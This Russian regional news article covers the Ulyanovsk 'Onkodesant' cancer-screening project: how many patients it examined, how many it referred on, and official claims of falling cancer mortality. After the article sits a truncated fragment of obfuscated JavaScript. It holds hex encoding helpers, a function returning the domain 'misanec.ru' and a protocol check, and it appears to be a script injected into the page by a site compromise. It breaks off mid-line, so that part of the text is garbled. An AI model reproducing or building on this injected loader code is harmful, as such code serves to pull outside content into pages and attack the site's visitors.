Просмотры325Комментарии0

В рамках акции «Онкодесант» медицинские специалисты Ульяновской области осмотрели более тысячи человек

Очередной выезд специалистов, участвующих в проекте, состоялась в клинической больнице №172 ФМБА России в Димитровграде 17 июня.

По информации специалистов регионального Минздрава, проект реализуется в регионе с марта 2015 года с целью профилактики онкологических заболеваний, оказания методической помощи специалистам районных медучреждений, а также повышения выявляемости патологии на ранних стадиях. В рамках проекта «Онкодесант» профильные акции прошли в Тереньгульском, Карсунском, Радищевском, Новомалыклинском, Инзенском, Майнском, Мелекесском, Сурском, Старомайнском районах и Димитровграде. Всего проконсультировано более 1334 пациентов группы риска, из них 145 – направлено на уточняющую диагностику в онкологический диспансер. Выезды в муниципалитеты будут проводиться в течение всего года, следующее мероприятие пройдёт Базарносызганском районе в конце августа.

По словам заместителя Председателя Правительства – Министра здравоохранения Ульяновской области Павла Дегтяря, во исполнение задач, поставленных в майских Указах Президента России Владимира Путина, в регионе разработан и внедрен комплекс мер, благодаря которому в Ульяновской области продолжает снижаться смертность от новообразований. «В 2016 году этот показатель сократилась на 0,4% по сравнению с аналогичным периодом прошлого года. Кроме того, благодаря внедрению новых медицинских методик уровень выявления в регионе больных злокачественными новообразованиями на ранних стадиях значительно улучшился. Так, в 2016 году он вырос на 3,1 % по сравнению с аналогичным периодом прошлого года. Мы планируем и дальше развивать эту службу и внедрять в работу новые технологии диагностики и лечения этого тяжелого заболевания», – отметил зампред.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "misanec.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Справедливый телефон
Как Губернатор Ульяновской области Русских стал Эльбрусских. «Справедливый телефон» №322 от 28.09.2021
Все выпуски Справедливого телефона

Популярное